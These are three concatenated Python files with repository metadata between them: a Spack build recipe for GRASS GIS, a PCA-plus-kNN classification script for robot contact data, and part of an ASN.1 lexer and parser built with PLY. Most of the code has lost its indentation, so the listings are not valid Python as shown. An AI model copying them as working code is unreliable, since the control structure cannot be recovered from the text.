variant('tiff', default=False, description='Support TIFF functionality')
variant('png', default=False, description='Support PNG functionality')
variant('postgres', default=False, description='Support PostgreSQL functionality')
variant('mysql', default=False, description='Support MySQL functionality')
variant('sqlite', default=False, description='Support SQLite functionality')
variant('opengl', default=False, description='Support OpenGL functionality')
variant('odbc', default=False, description='Support ODBC functionality')
variant('fftw', default=False, description='Support FFTW functionality')
variant('blas', default=False, description='Support BLAS functionality')
variant('lapack', default=False, description='Support LAPACK functionality')
variant('cairo', default=False, description='Support Cairo functionality')
variant('freetype', default=False, description='Support FreeType functionality')
variant('readline', default=False, description='Support Readline functionality')
variant('regex', default=False, description='Support regex functionality')
variant('pthread', default=False, description='Support POSIX threads functionality')
variant('openmp', default=False, description='Support OpenMP functionality')
variant('opencl', default=False, description='Support OpenCL functionality')
variant('bzlib', default=False, description='Support BZIP2 functionality')
variant('zstd', default=False, description='Support Zstandard functionality')
variant('gdal', default=True, description='Enable GDAL/OGR support')
variant('liblas', default=False, description='Enable libLAS support')
variant('wxwidgets', default=False, description='Enable wxWidgets support')
variant('netcdf', default=False, description='Enable NetCDF support')
variant('geos', default=False, description='Enable GEOS support')
variant('x', default=False, description='Use the X Window System')
# https://htmlpreview.github.io/?https://github.com/OSGeo/grass/blob/master/REQUIREMENTS.html
# General requirements
depends_on('gmake@3.81:', type='build')
depends_on('iconv')
depends_on('zlib')
depends_on('flex', type='build')
depends_on('bison', type='build')
depends_on('proj')
depends_on('proj@:4', when='@:7.5')
# GRASS 7.8.0 was supposed to support PROJ 6, but it still checks for
# share/proj/epsg, which was removed in PROJ 6
depends_on('proj@:5', when='@:7.8.0')
# PROJ6 support released in GRASS 7.8.1
# https://courses.neteler.org/grass-gis-7-8-1-released-with-proj-6-and-gdal-3-support/
depends_on('proj@6:', when='@7.8.1:')
depends_on('python@2.7:', type=('build', 'run'))
depends_on('python@2.7:2.8', when='@:7.6', type=('build', 'run'))
depends_on('py-six', when='@7.8:', type=('build', 'run'))
# Optional packages
depends_on('libtiff', when='+tiff')
depends_on('libpng', when='+png')
depends_on('postgresql', when='+postgres')
depends_on('mariadb', when='+mysql')
depends_on('sqlite', when='+sqlite')
depends_on('gl', when='+opengl')
depends_on('unixodbc', when='+odbc')
depends_on('fftw', when='+fftw')
depends_on('blas', when='+blas')
depends_on('lapack', when='+lapack')
depends_on('cairo@1.5.8:', when='+cairo')
depends_on('freetype', when='+freetype')
depends_on('readline', when='+readline')
depends_on('opencl', when='+opencl')
depends_on('bzip2', when='+bzlib')
depends_on('zstd', when='+zstd')
depends_on('gdal@:3.2', when='+gdal')
depends_on('liblas', when='+liblas')
depends_on('wxwidgets', when='+wxwidgets')
depends_on('py-wxpython@2.8.10.1:', when='+wxwidgets', type=('build', 'run'))
depends_on('netcdf-c', when='+netcdf')
depends_on('geos', when='+geos')
depends_on('libx11', when='+x')
def url_for_version(self, version):
url = "https://grass.osgeo.org/grass{0}/source/grass-{1}.tar.gz"
return url.format(version.up_to(2).joined, version)
# https://grasswiki.osgeo.org/wiki/Compile_and_Install
def configure_args(self):
spec = self.spec
args = [
'--without-nls',
# TODO: add packages for these optional dependencies
'--without-opendwg',
'--without-pdal',
'--with-proj-share={0}'.format(spec['proj'].prefix.share.proj),
]
if '+cxx' in spec:
args.append('--with-cxx')
else:
args.append('--without-cxx')
if '+tiff' in spec:
args.append('--with-tiff')
else:
args.append('--without-tiff')
if '+png' in spec:
args.append('--with-png')
else:
args.append('--without-png')
if '+postgres' in spec:
args.append('--with-postgres')
else:
args.append('--without-postgres')
if '+mysql' in spec:
args.append('--with-mysql')
else:
args.append('--without-mysql')
if '+sqlite' in spec:
args.append('--with-sqlite')
else:
args.append('--without-sqlite')
if '+opengl' in spec:
args.append('--with-opengl')
else:
args.append('--without-opengl')
if '+odbc' in spec:
args.append('--with-odbc')
else:
args.append('--without-odbc')
if '+fftw' in spec:
args.append('--with-fftw')
else:
args.append('--without-fftw')
if '+blas' in spec:
args.append('--with-blas')
else:
args.append('--without-blas')
if '+lapack' in spec:
args.append('--with-lapack')
else:
args.append('--without-lapack')
if '+cairo' in spec:
args.append('--with-cairo')
else:
args.append('--without-cairo')
if '+freetype' in spec:
args.append('--with-freetype')
else:
args.append('--without-freetype')
if '+readline' in spec:
args.append('--with-readline')
else:
args.append('--without-readline')
if '+regex' in spec:
args.append('--with-regex')
else:
args.append('--without-regex')
if '+pthread' in spec:
args.append('--with-pthread')
else:
args.append('--without-pthread')
if '+openmp' in spec:
args.append('--with-openmp')
else:
args.append('--without-openmp')
if '+opencl' in spec:
args.append('--with-opencl')
else:
args.append('--without-opencl')
if '+bzlib' in spec:
args.append('--with-bzlib')
else:
args.append('--without-bzlib')
if '+zstd' in spec:
args.append('--with-zstd')
else:
args.append('--without-zstd')
if '+gdal' in spec:
args.append('--with-gdal={0}/gdal-config'.format(
spec['gdal'].prefix.bin))
else:
args.append('--without-gdal')
if '+liblas' in spec:
args.append('--with-liblas={0}/liblas-config'.format(
spec['liblas'].prefix.bin))
else:
args.append('--without-liblas')
if '+wxwidgets' in spec:
args.append('--with-wxwidgets={0}/wx-config'.format(
spec['wxwidgets'].prefix.bin))
else:
args.append('--without-wxwidgets')
if '+netcdf' in spec:
args.append('--with-netcdf={0}/bin/nc-config'.format(
spec['netcdf-c'].prefix))
else:
args.append('--without-netcdf')
if '+geos' in spec:
args.append('--with-geos={0}/bin/geos-config'.format(
spec['geos'].prefix))
else:
args.append('--without-geos')
if '+x' in spec:
args.append('--with-x')
else:
args.append('--without-x')
return args
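    # Possible condensation (a sketch, assuming Spack's
    # AutotoolsPackage.with_or_without helper; the variants that pass a
    # config-script path, e.g. gdal/liblas/wxwidgets/netcdf/geos, would
    # still need their explicit branches):
    #
    #     for flag in ('cxx', 'tiff', 'png', 'postgres', 'mysql', 'sqlite'):
    #         args.extend(self.with_or_without(flag))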
# see issue: https://github.com/spack/spack/issues/11325
# 'Platform.make' is created after configure step
# hence invoke the following function afterwards
@run_after('configure')
def fix_iconv_linking(self):
if self.spec['iconv'].name != 'libiconv':
return
makefile = FileFilter('include/Make/Platform.make')
makefile.filter(r'^ICONVLIB\s*=.*', 'ICONVLIB = -liconv')
|
LLNL/spack
|
var/spack/repos/builtin/packages/grass/package.py
|
Python
|
lgpl-2.1
| 10,619
|
[
"NetCDF"
] |
b0ce8f70226af8fc98bedd6f0b915a77ea155a2b096b7bebe85cd2d2c01f8be5
|
# Principal Component Analysis Code :
from numpy import mean,cov,double,cumsum,dot,linalg,array,rank,size,flipud
from pylab import *
import numpy as np
import matplotlib.pyplot as pp
#from enthought.mayavi import mlab
import scipy.ndimage as ni
import roslib; roslib.load_manifest('sandbox_tapo_darpa_m3')
import rospy
#import hrl_lib.mayavi2_util as mu
import hrl_lib.viz as hv
import hrl_lib.util as ut
import hrl_lib.matplotlib_util as mpu
import pickle
from mvpa.clfs.knn import kNN
from mvpa.datasets import Dataset
from mvpa.clfs.transerror import TransferError
from mvpa.misc.data_generators import normalFeatureDataset
from mvpa.algorithms.cvtranserror import CrossValidatedTransferError
from mvpa.datasets.splitters import NFoldSplitter
import sys
sys.path.insert(0, '/home/tapo/svn/robot1_data/usr/tapo/data_code/Classification/Data/Single_Contact_kNN/Scaled')
from data_method_III import Fmat_original
def pca(X):
#get dimensions
num_data,dim = X.shape
#center data
mean_X = X.mean(axis=1)
M = (X-mean_X) # subtract the mean (along columns)
Mcov = cov(M)
###### Sanity Check ######
i=0
n=0
while i < 123:
j=0
while j < 140:
if X[i,j] != X[i,j]:
print X[i,j]
print i,j
n=n+1
j = j+1
i=i+1
print n
##########################
print 'PCA - COV-Method used'
val,vec = linalg.eig(Mcov)
#return the projection matrix, the variance and the mean
return vec,val,mean_X, M, Mcov
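# Note on the sanity check above: it relies on the fact that NaN != NaN.
# A vectorized equivalent (an alternative, not part of the original run)
# would be:
#     print np.isnan(X).sum()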
def my_mvpa(Y,num2):
#Using PYMVPA
PCA_data = np.array(Y)
PCA_label_1 = ['Fixed']*35 + ['Movable']*35 + ['Fixed']*35 + ['Movable']*35
PCA_chunk_1 = ['Styrofoam-Fixed']*5 + ['Books-Fixed']*5 + ['Bucket-Fixed']*5 + ['Bowl-Fixed']*5 + ['Can-Fixed']*5 + ['Box-Fixed']*5 + ['Pipe-Fixed']*5 + ['Styrofoam-Movable']*5 + ['Container-Movable']*5 + ['Books-Movable']*5 + ['Cloth-Roll-Movable']*5 + ['Black-Rubber-Movable']*5 + ['Can-Movable']*5 + ['Box-Movable']*5 + ['Rug-Fixed']*5 + ['Bubble-Wrap-1-Fixed']*5 + ['Pillow-1-Fixed']*5 + ['Bubble-Wrap-2-Fixed']*5 + ['Sponge-Fixed']*5 + ['Foliage-Fixed']*5 + ['Pillow-2-Fixed']*5 + ['Rug-Movable']*5 + ['Bubble-Wrap-1-Movable']*5 + ['Pillow-1-Movable']*5 + ['Bubble-Wrap-2-Movable']*5 + ['Pillow-2-Movable']*5 + ['Cushion-Movable']*5 + ['Sponge-Movable']*5
clf = kNN(k=num2)
terr = TransferError(clf)
ds1 = Dataset(samples=PCA_data,labels=PCA_label_1,chunks=PCA_chunk_1)
cvterr = CrossValidatedTransferError(terr,NFoldSplitter(cvtype=1),enable_states=['confusion'])
error = cvterr(ds1)
return (1-error)*100
def result(eigvec_total,eigval_total,mean_data_total,B,C,num_PC):
# Reduced Eigen-Vector Matrix according to highest Eigenvalues..(Considering First 20 based on above figure)
W = eigvec_total[:,0:num_PC]
m_W, n_W = np.shape(W)
    # Normalizes the data set with respect to its variance (not an integral part of PCA, but useful)
length = len(eigval_total)
s = np.matrix(np.zeros(length)).T
i = 0
while i < length:
s[i] = sqrt(C[i,i])
i = i+1
Z = np.divide(B,s)
m_Z, n_Z = np.shape(Z)
#Projected Data:
Y = (W.T)*B # 'B' for my Laptop: otherwise 'Z' instead of 'B'
m_Y, n_Y = np.shape(Y.T)
return Y.T
if __name__ == '__main__':
Fmat = Fmat_original
# Checking the Data-Matrix
m_tot, n_tot = np.shape(Fmat)
print 'Total_Matrix_Shape:',m_tot,n_tot
eigvec_total, eigval_total, mean_data_total, B, C = pca(Fmat)
#print eigvec_total
#print eigval_total
#print mean_data_total
m_eigval_total, n_eigval_total = np.shape(np.matrix(eigval_total))
m_eigvec_total, n_eigvec_total = np.shape(eigvec_total)
m_mean_data_total, n_mean_data_total = np.shape(np.matrix(mean_data_total))
print 'Eigenvalue Shape:',m_eigval_total, n_eigval_total
print 'Eigenvector Shape:',m_eigvec_total, n_eigvec_total
print 'Mean-Data Shape:',m_mean_data_total, n_mean_data_total
    # Recall that the cumulative sum of the eigenvalues shows the level of variance accounted for by each of the corresponding eigenvectors; the x axis is the number of eigenvalues used.
perc_total = cumsum(eigval_total)/sum(eigval_total)
num_PC=1
while num_PC <=20:
Proj = np.zeros((140,num_PC))
Proj = result(eigvec_total,eigval_total,mean_data_total,B,C,num_PC)
# PYMVPA:
num=0
cv_acc = np.zeros(21)
while num <=20:
cv_acc[num] = my_mvpa(Proj,num)
num = num+1
plot(np.arange(21),cv_acc,'-s')
grid('True')
hold('True')
num_PC = num_PC+1
legend(('1-PC', '2-PCs', '3-PCs', '4-PCs', '5-PCs', '6-PCs', '7-PCs', '8-PCs', '9-PCs', '10-PCs', '11-PC', '12-PCs', '13-PCs', '14-PCs', '15-PCs', '16-PCs', '17-PCs', '18-PCs', '19-PCs', '20-PCs'))
ylabel('Cross-Validation Accuracy')
xlabel('k in k-NN Classifier')
show()
|
tapomayukh/projects_in_python
|
classification/Classification_with_kNN/Single_Contact_Classification/Scaled_Features/best_kNN_PCA/2_categories/test11_cross_validate_categories_mov_fixed_1200ms_scaled_method_iii.py
|
Python
|
mit
| 5,012
|
[
"Mayavi"
] |
dafc16279e4960909d137d444a7bcf165949961f3b9c80283a3d16d40e538429
|
#!/usr/bin/env python
from __future__ import nested_scopes
import visitor
"""Compiler from ASN.1 specification to the Python format acceptable
to my asn1.py module. Loosely based on esnacc grammar. We ignore
MACROs, CONSUMER INVOKES, SUPPLIER INVOKES, and a lot of stuff, for simplicity.
We also ignore the {...} syntax for basic values, so we don't need separate
lexer states.
"""
# TODO:
# toposort structures, handle recursive structures better than PyQuote hack
# figure out mapping of asn.1 modules to python modules (probably as classes)
# handle int_2/num_list
# handle ANY, ANY DESCRIBED BY
# we replace '-' in idents w/ '_' during lexing. Is this OK, or should it be done at output?
class LexError(Exception): pass
class ParseError(Exception): pass
static_tokens = {
'\.' : 'DOT',
',' : 'COMMA',
'\{' : 'LBRACE',
'\}' : 'RBRACE',
'\(' : 'LPAREN',
'\)' : 'RPAREN',
'\[' : 'LBRACK',
'\]' : 'RBRACK',
'<' : 'LT',
'-' : 'MINUS',
'\.\.' : 'RANGE',
'\.\.\.' : 'ELLIPSIS',
'::=': 'GETS',
'\|' : 'BAR',
';' : 'SEMICOLON'
}
# all keys in reserved_words must start w/ upper case
reserved_words = {
'TAGS' : 'TAGS',
'BOOLEAN' : 'BOOLEAN',
'INTEGER' : 'INTEGER',
'BIT' : 'BIT',
'STRING' : 'STRING',
'OCTET' : 'OCTET',
'NULL' : 'NULL',
'SEQUENCE': 'SEQUENCE',
'OF' : 'OF',
'SET' : 'SET',
'IMPLICIT': 'IMPLICIT',
'CHOICE' : 'CHOICE',
'ANY' : 'ANY',
'EXTERNAL' : 'EXTERNAL', # XXX added over base
'OPTIONAL':'OPTIONAL',
'DEFAULT' : 'DEFAULT',
'COMPONENTS': 'COMPONENTS',
'UNIVERSAL' : 'UNIVERSAL',
'APPLICATION' : 'APPLICATION',
'PRIVATE' : 'PRIVATE',
'TRUE' : 'TRUE',
'FALSE' : 'FALSE',
'BEGIN' : 'BEGIN',
'END' : 'END',
'DEFINITIONS' : 'DEFINITIONS',
'EXPLICIT' : 'EXPLICIT',
'ENUMERATED' : 'ENUMERATED',
'EXPORTS' : 'EXPORTS',
'IMPORTS' : 'IMPORTS',
'REAL' : 'REAL',
'INCLUDES': 'INCLUDES',
'MIN' : 'MIN',
'MAX' : 'MAX',
'SIZE' : 'SIZE',
'FROM' : 'FROM',
'WITH' : 'WITH',
'COMPONENT': 'COMPONENT',
'PRESENT' : 'PRESENT',
'ABSENT' : 'ABSENT',
'DEFINED' : 'DEFINED',
'BY' : 'BY',
'PLUS-INFINITY' : 'PLUS_INFINITY',
'MINUS-INFINITY' : 'MINUS_INFINITY',
'GeneralizedTime' : 'GENERALIZEDTIME',
'UTCTime' : 'UTCTIME',
'ObjectDescriptor': 'OBJECTDESCRIPTOR',
'AUTOMATIC': 'AUTOMATIC',
# 'OPERATION' : 'OPERATION',
# 'ARGUMENT' : 'ARGUMENT',
# 'RESULT' : 'RESULT',
# 'ERRORS' : 'ERRORS',
# 'LINKED' : 'LINKED',
# 'ERROR' : 'ERROR',
# 'PARAMETER' : 'PARAMETER',
# 'BIND' : 'BIND',
# 'BIND-ERROR' : 'BIND_ERROR',
# 'UNBIND' : 'UNBIND',
# 'APPLICATION-CONTEXT' : 'AC',
# 'APPLICATON-SERVICE-ELEMENTS' : 'ASES',
# 'REMOTE' : 'REMOTE',
# 'INITIATOR' : 'INITIATOR',
# 'RESPONDER' : 'RESPONDER',
# 'APPLICATION-SERVICE-ELEMENT' : 'ASE',
# 'OPERATIONS' : None,
# 'EXTENSION-ATTRIBUTE' : 'EXTENSION_ATTRIBUTE',
# 'EXTENSIONS' : None,
# 'CHOSEN' : None,
# 'EXTENSION' : None,
# 'CRITICAL': None,
# 'FOR' : None,
# 'SUBMISSION' : None,
# 'DELIVERY' : None,
# 'TRANSFER' : None,
# 'OBJECT' : None,
# 'PORTS' : None,
# 'PORT' : None,
# r'ABSTRACT\s*OPERATIONS' : 'ABSTR_OPS',
# 'REFINE' : None,
# 'AS' : None,
# 'RECURRING' : None
}
for k in static_tokens.keys ():
if static_tokens [k] == None:
static_tokens [k] = k
StringTypes = ['Numeric', 'Printable', 'IA5', 'BMP', 'Universal', 'UTF8',
'Teletex', 'T61', 'Videotex', 'Graphics', 'ISO646', 'Visible',
'General']
string_tok_names = map (lambda x : x + 'String', StringTypes)
tokens = static_tokens.values () + ['OBJECT_IDENTIFIER', 'STRING_T',
'BSTRING', 'HSTRING', 'QSTRING',
'UCASE_IDENT', 'LCASE_IDENT',
'NUMBER', 'PYQUOTE'] + reserved_words.values ()
def t_OBJECT_IDENTIFIER (t):
r"OBJECT\s+IDENTIFIER"
return t
def t_STRING_T(t):
return t
t_STRING_T.__doc__ = "(%s)String" % "|".join (map
(lambda x: '(' + x + ')', StringTypes))
cur_mod = __import__ (__name__) # XXX blech!
for (k, v) in static_tokens.items ():
cur_mod.__dict__['t_' + v] = k
def t_BSTRING (t):
r"'[01]*'B"
return t
def t_HSTRING (t):
r"'[0-9A-Fa-f]*'H"
return t
def t_QSTRING (t):
r'"([^"]|"")*"'
return t # XXX might want to un-""
def t_UCASE_IDENT (t):
r"[A-Z](-[a-zA-Z0-9]|[a-zA-Z0-9])*" # can't end w/ '-'
t.type = reserved_words.get (t.value, "UCASE_IDENT")
# t.value = t.value.replace ('-', '_') # XXX is it OK to do '-' to '_' during lex
return t
def t_LCASE_IDENT (t):
r"[a-z](-[a-zA-Z0-9]|[a-zA-Z0-9])*" # can't end w/ '-'
# t.value = t.value.replace ('-', '_')# XXX is it OK to do '-' to '_' during lex
return t
def t_NUMBER (t):
r"0|([1-9][0-9]*)"
return t
pyquote_str = 'PYQUOTE'
def t_COMMENT(t):
r"--(-[^\-\n]|[^\-\n])*(--|\n|-\n)"
if (t.value.find("\n") >= 0) : t.lineno += 1
if t.value[2:2+len (pyquote_str)] == pyquote_str:
t.value = t.value[2+len(pyquote_str):]
t.value = t.value.lstrip ()
t.type = pyquote_str
return t
return None
t_ignore = " \t\r"
def t_NEWLINE(t):
r'\n+'
t.lineno += t.value.count("\n")
def t_error(t):
print "Error", repr(t.value[:100]), t.lineno
raise LexError
import lex
lexer = lex.lex()
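# Hedged usage sketch (not in the original source): tokenizing a snippet
# with the PLY lexer built above.
#
#     lexer.input("Foo ::= SEQUENCE { bar INTEGER }")
#     tok = lexer.token()
#     while tok:
#         print tok.type, tok.value
#         tok = lexer.token()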
import yacc
class Node:
def __init__(self,*args, **kw):
if len (args) == 0:
self.type = self.__class__.__name__
else:
assert (len(args) == 1)
self.type = args[0]
self.__dict__.update (kw)
def str_child (self, key, child, depth):
if key == 'type': # already processed in str_depth
return ""
if isinstance (child, Node): # ugh
return child.str_depth (depth)
indent = " " * (4 * depth)
keystr = indent + key + ":\n"
if type (child) == type ([]):
return keystr + indent.join (map (str, child)) + "\n"
else:
return keystr + indent + str (child) + "\n"
def str_depth (self, depth): # ugh
indent = " " * (4 * depth)
l = ["%s%s" % (indent, self.type)]
l.append ("".join (map (lambda (k,v): self.str_child (k, v, depth + 1),
self.__dict__.items ())))
return "\n".join (l)
def get_typ (self):
return self
def set_name (self, name): # only overridden for SEQUENCE
pass
def __str__(self):
return "\n" + self.str_depth (0)
class Module (Node):
pass
class ModuleIdent (Node):
pass
class Module_Body (Node):
pass
class Default_Tags (Node):
pass
class Type_Assign (Node):
def __init__ (self, *args, **kw):
Node.__init__ (self, *args, **kw)
to_test = self.val.get_typ ()
to_test.set_name (self.name.name) # currently only for naming SEQUENCE
# for debugging purposes
# XXX should also collect names for SEQUENCE inside SEQUENCE or
# CHOICE or SEQUENCE_OF (where should the SEQUENCE_OF name come
# from? for others, element or arm name would be fine)
class PyQuote (Node):
pass
class Type_Ref (Node):
pass
class Sequence_Of (Node):
pass
class Set_Of (Node):
pass
class Tag (Node):
def get_typ (self):
return self.typ
class ElementType(Node):
pass
class Sequence (Node):
def set_name (self, name):
self.sequence_name = name
class Choice (Node):
pass
class Subtype (Node):
pass
class Size(Node):
pass
class From(Node):
pass
class Constraint (Node):
pass
class Enum (Node):
pass
class Literal (Node):
pass
class NamedNumber (Node):
pass
class NamedNumListBase(Node):
pass
class ValueRange(Node):
pass
class Integer (NamedNumListBase):
asn1_typ = 'INTEGER'
class BitString (NamedNumListBase):
asn1_typ = 'BITSTRING'
class NamedType (Node):
pass
class BaseType (Node):
pass
def p_module_list_1 (t):
'module_list : module_list module_def'
t[0] = t[1] + [t[2]]
def p_module_list_2 (t):
'module_list : module_def'
t[0] = [t[1]]
def p_module_def (t):
'module_def : module_ident DEFINITIONS tag_default GETS BEGIN module_body END'
body = t[6]
t[0] = Module (ident = t[1], tag_def = t[3],
exports = body.exports, imports = body.imports, assign_list = body.assign_list)
def p_tag_default_1 (t):
'''tag_default : EXPLICIT TAGS
| IMPLICIT TAGS
| AUTOMATIC TAGS'''
t[0] = Default_Tags (dfl_tag = t[1])
def p_tag_default_2 (t):
'tag_default : '
t[0] = Default_Tags (dfl_tag = 'EXPLICIT')
def p_module_ident (t):
'module_ident : type_ref assigned_ident' # name, oid
# XXX coerce type_ref to module_ref?
if t[2] == None:
t[0] = ModuleIdent (name=t[1].name, assigned_ident = None)
else:
t[0] = ModuleIdent (name=t[1].name, assigned_ident = t[2])
# XXX originally we had both type_ref and module_ref, but that caused
# a reduce/reduce conflict (because both were UCASE_IDENT). Presumably
# this didn't cause a problem in the original ESNACC grammar because it
# was LALR(1) and PLY is (as of 1.1) only SLR.
#def p_module_ref (t):
# 'module_ref : UCASE_IDENT'
# t[0] = t[1]
def p_assigned_ident_1 (t):
'assigned_ident : oid_val'
t[0] = t[1]
def p_assigned_ident_2 (t):
'assigned_ident : '
t[0] = None
def p_module_body_1 (t):
'module_body : exports imports assign_list'
t[0] = Module_Body (exports = t[1], imports = t[2], assign_list = t[3])
def p_module_body_2 (t):
'module_body : '
t[0] = Module_Body (exports = [], imports = [], assign_list = [])
def p_exports_1 (t):
'exports : EXPORTS syms_exported SEMICOLON'
t[0] = t[2]
def p_exports_2 (t):
'exports : '
t[0] = []
def p_syms_exported_1 (t):
'syms_exported : exp_sym_list'
t[0] = t[1]
def p_syms_exported_2 (t):
'syms_exported : '
t[0] = []
def p_exp_sym_list_1 (t):
'exp_sym_list : symbol'
t[0] = [t[1]]
def p_exp_sym_list_2 (t):
'exp_sym_list : exp_sym_list COMMA symbol'
t[0] = t[1] + [t[3]]
def p_imports_1(t):
'imports : IMPORTS syms_imported SEMICOLON'
t[0] = t[2]
def p_imports_2 (t):
'imports : '
t[0] = []
def p_syms_imported_1(t):
'syms_imported : '
t[0] = []
def p_syms_imported_2 (t):
'syms_imported : syms_from_module_list'
t[0] = t[1]
def p_syms_from_module_list_1 (t):
'syms_from_module_list : syms_from_module_list syms_from_module'
t[0] = t[1] + [t[2]]
def p_syms_from_module_list_2 (t):
'syms_from_module_list : syms_from_module'
t[0] = [t[1]]
def p_syms_from_module (t):
'syms_from_module : symbol_list FROM module_ident'
t[0] = Node ('syms_list', symbol_list = t[1], module = t[3])
def p_symbol_list_1 (t):
'''symbol_list : symbol_list COMMA symbol'''
t[0] = t[1] + [t[3]]
def p_symbol_list_2 (t):
'symbol_list : symbol'
t[0] = [t[1]]
def p_symbol (t):
'''symbol : type_ref
| identifier''' # XXX omit DefinedMacroName
t[0] = t[1]
def p_assign_list_1 (t):
'assign_list : assign_list assign'
t[0] = t[1] + [t[2]]
def p_assign_list_2 (t):
'assign_list : assign SEMICOLON'
t[0] = [t[1]]
def p_assign_list_3 (t):
'assign_list : assign'
t[0] = [t[1]]
def p_assign (t):
'''assign : type_assign
| value_assign
| pyquote'''
t[0] = t[1]
def p_pyquote (t):
'''pyquote : PYQUOTE'''
t[0] = PyQuote (val = t[1])
def p_type_assign (t):
'type_assign : type_ref GETS type'
t[0] = Type_Assign (name = t[1], val = t[3])
def p_type (t): # XXX ignore DefinedMacroType
'''type : builtin_type
| defined_type
| sub_type'''
t[0] = t[1]
def p_ext_type_ref (t):
'ext_type_ref : type_ref DOT type_ref'
# XXX coerce 1st type_ref to module_ref
t[0] = Node ('ext_type_ref', module = t[1], typ = t[3])
def p_defined_type (t): # XXX old comment: could by CharacterString or Useful types too
'''defined_type : ext_type_ref
| type_ref'''
t[0] = t[1]
def p_builtin_type_1 (t):
'''builtin_type : boolean_type
| integer_type
| bitstring_type
| null_type
| sequence_type
| sequenceof_type
| set_type
| setof_type
| choice_type
| selection_type
| tagged_type
| any_type
| oid_type
| enum_type
| real_type
| char_str_type
| useful_type'''
t[0] = t[1]
def p_builtin_type_2 (t):
'builtin_type : OCTET STRING'
t[0] = BaseType (val = 'OCTSTRING')
def p_named_type_1 (t):
'named_type : identifier type'
t[0] = NamedType (ident = t[1], typ = t[2])
def p_named_type_2 (t):
'named_type : type' # XXX handles selectionType as well old comment??
t[0] = NamedType (ident = None, typ = t[1])
def p_boolean_type (t):
'boolean_type : BOOLEAN'
t[0] = BaseType (val = 'BOOLEAN')
def p_integer_type_1 (t):
'integer_type : INTEGER'
t[0] = Integer (named_list = [])
def p_integer_type_2 (t):
'integer_type : INTEGER LBRACE named_number_list RBRACE'
t[0] = Integer (named_list = t[3])
def p_named_number_list_1 (t):
'named_number_list : named_number_list COMMA named_number'
t[0] = t[1] + [t[3]]
def p_named_number_list_2 (t):
'named_number_list : named_number'
t[0] = [t[1]]
def p_named_number (t):
'''named_number : identifier LPAREN signed_number RPAREN
| identifier LPAREN defined_value RPAREN'''
t[0] = NamedNumber (ident = t[1], val = t[3])
# XXX numbers used to errchk for 32-bit ranged
def p_signed_number_1 (t):
'signed_number : NUMBER'
t[0] = t [1]
def p_signed_number_2 (t):
'signed_number : MINUS NUMBER'
t[0] = '-' + t[2]
def p_enum_type_1 (t):
'enum_type : ENUMERATED LBRACE named_number_list RBRACE'
t[0] = Enum (val = t[3])
def p_enum_type_2 (t):
'enum_type : ENUMERATED LBRACE named_number_list COMMA ELLIPSIS RBRACE'
t[0] = Enum (val = t[3], ext=[])
def p_real_type (t):
'real_type : REAL'
t[0] = BaseType (val = 'REAL')
def p_bitstring_type_1 (t):
'bitstring_type : BIT STRING'
t[0] = BitString (named_list = [])
def p_bitstring_type_2 (t):
'bitstring_type : BIT STRING LBRACE named_bit_list RBRACE'
t[0] = BitString (named_list = t[4])
def p_named_bit_list (t):
'named_bit_list : named_number_list'
t[0] = t[1]
def p_null_type (t):
'null_type : NULL'
t[0] = BaseType (val='NULL')
def p_sequence_type (t):
'sequence_type : SEQUENCE LBRACE component_type_lists RBRACE'
# XXX
if isinstance (t[3], list):
assert (len (t[3]) == 0)
t[0] = Sequence (elt_list=[], ext_list = None)
else:
if t[3].has_key('ext_list'):
t[0] = Sequence (elt_list = t[3]['elt_list'], ext_list = t[3]['ext_list'])
else:
t[0] = Sequence (elt_list = t[3]['elt_list'], ext_list = None)
def p_sequence_type_2 (t):
'sequence_type : SEQUENCE LBRACE RBRACE'
t[0] = Sequence (elt_list=[], ext_list =None)
def p_extension_and_exception_1 (t):
'extension_and_exception : ELLIPSIS'
t[0] = []
def p_optional_extension_marker_1 (t):
'optional_extension_marker : COMMA ELLIPSIS'
t[0] = True
def p_optional_extension_marker_2 (t):
'optional_extension_marker : '
t[0] = False
def p_component_type_lists_1 (t):
'component_type_lists : element_type_list'
t[0] = {'elt_list' : t[1]}
def p_component_type_lists_2 (t):
'''component_type_lists : element_type_list COMMA extension_and_exception extension_additions optional_extension_marker'''
t[0] = {'elt_list' : t[1], 'ext_list' : t[4]}
def p_component_type_lists_3 (t):
'''component_type_lists : extension_and_exception extension_additions optional_extension_marker'''
t[0] = []
def p_extension_additions_1 (t):
'extension_additions : extension_addition_list'
t[0] = t[1]
def p_extension_additions_2 (t):
'extension_additions : '
t[0] = []
def p_extension_addition_list_1 (t):
'extension_addition_list : COMMA extension_addition'
t[0] = [t[2]]
def p_extension_addition_list_2 (t):
'extension_addition_list : extension_addition_list COMMA extension_addition'
t[0] = t[1] + [t[3]]
def p_extension_addition_1 (t):
'extension_addition : element_type'
t[0] = t[1]
def p_element_type_list_1 (t):
'element_type_list : element_type'
t[0] = [t[1]]
def p_element_type_list_2 (t):
'element_type_list : element_type_list COMMA element_type'
t[0] = t[1] + [t[3]]
def p_element_type_1 (t):
'element_type : named_type'
t[0] = ElementType (val = t[1], optional = 0, default = None)
def p_element_type_2 (t):
'element_type : named_type OPTIONAL'
t[0] = ElementType (val = t[1], optional = 1, default = None)
def p_element_type_3 (t):
'element_type : named_type DEFAULT named_value'
t[0] = ElementType (val = t[1], optional = 1, default = t[3])
# /*
# * this rules uses NamedValue instead of Value
# * for the stupid choice value syntax (fieldname value)
# * it should be like a set/seq value (ie with
# * enclosing { }
# */
# XXX get to COMPONENTS later
def p_sequenceof_type (t):
'sequenceof_type : SEQUENCE OF type'
t[0] = Sequence_Of (val = t[3], size_constr = None)
def p_set_type (t):
'set_type : SET LBRACE element_type_list RBRACE'
t[0] = Node ('set', val = t[3])
def p_setof_type (t):
'setof_type : SET OF type'
t[0] = Set_Of (val=t[3])
def p_choice_type (t):
'choice_type : CHOICE LBRACE alternative_type_lists RBRACE'
if t[3].has_key('ext_list'):
t[0] = Choice (elt_list = t[3]['elt_list'], ext_list = t[3]['ext_list'])
else:
t[0] = Choice (elt_list = t[3]['elt_list'], ext_list = None)
def p_alternative_type_lists_1 (t):
'alternative_type_lists : alternative_type_list'
t[0] = {'elt_list' : t[1]}
def p_alternative_type_lists_2 (t):
'''alternative_type_lists : alternative_type_list COMMA extension_and_exception extension_addition_alternatives optional_extension_marker'''
t[0] = {'elt_list' : t[1], 'ext_list' : t[4]}
def p_extension_addition_alternatives_1 (t):
'extension_addition_alternatives : extension_addition_alternatives_list'
t[0] = t[1]
def p_extension_addition_alternatives_2 (t):
'extension_addition_alternatives : '
t[0] = []
def p_extension_addition_alternatives_list_1 (t):
'extension_addition_alternatives_list : COMMA extension_addition_alternative'
t[0] = [t[2]]
def p_extension_addition_alternatives_list_2 (t):
